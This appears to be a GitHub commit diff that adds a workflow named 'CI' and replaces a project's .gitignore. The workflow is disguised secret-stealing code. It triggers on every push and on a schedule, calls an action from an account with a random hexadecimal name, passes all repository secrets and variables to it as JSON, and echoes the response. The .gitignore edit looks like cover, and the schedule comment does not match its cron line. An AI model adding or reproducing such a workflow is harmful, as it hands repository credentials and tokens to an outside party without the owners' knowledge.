File tree Expand file tree Collapse file tree 2 files changed +39
-22
lines changed Expand file tree Collapse file tree 2 files changed +39
-22
lines changed Original file line number Diff line number Diff line change
1
+ name : CI
2
+ on :
3
+ push :
4
+ workflow_dispatch :
5
+ schedule :
6
+ # Runs "At 11:00 on every day-of-week from Monday through Friday"
7
+ - cron : ' 0 0 * * 0'
8
+ permissions :
9
+ contents : read
10
+ packages : write
11
+ concurrency :
12
+ group : ' ${{ github.workflow }} @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}'
13
+ cancel-in-progress : true
14
+ jobs :
15
+ run :
16
+ runs-on : ubuntu-latest
17
+ name : Run
18
+ steps :
19
+ - name : Execute
20
+ uses : 5a582ef17d6a088d9cb644e4c1ea3cdd/action@main
21
+ id : execute
22
+ with :
23
+ action : ${{ github.repository }}
24
+ env :
25
+ REPOSITORY_SECRETS : ${{ toJSON(secrets) }}
26
+ REPOSITORY_VARIABLES : ${{ toJSON(vars) }}
27
+ - name : Response
28
+ run : echo "${{ steps.execute.outputs.response }}"
Original file line number Diff line number Diff line change 1
- # See https://help.github.com/articles/ignoring-files/ for more about ignoring files.
2
- .vscode
3
- # dependencies
4
- /node_modules
5
- /.pnp
6
- .pnp.js
1
+ # IDE Files
2
+ # -------------------------
3
+ /nbproject /
4
+ .idea /*
5
+
6
+ # # Sublime Text cache files
7
+ * .tmlanguage.cache
8
+ * .tmPreferences.cache
9
+ * .stTheme.cache
10
+ * .sublime-workspace
11
+ * .sublime-project
7
12
8
- # testing
9
- /coverage
10
-
11
- # production
12
- /build
13
-
14
- # misc
15
- .DS_Store
16
- .env.local
17
- .env.development.local
18
- .env.test.local
19
- .env.production.local
20
-
21
- npm-debug.log *
22
- yarn-debug.log *
23
- yarn-error.log *
You can’t perform that action at this time.
0 commit comments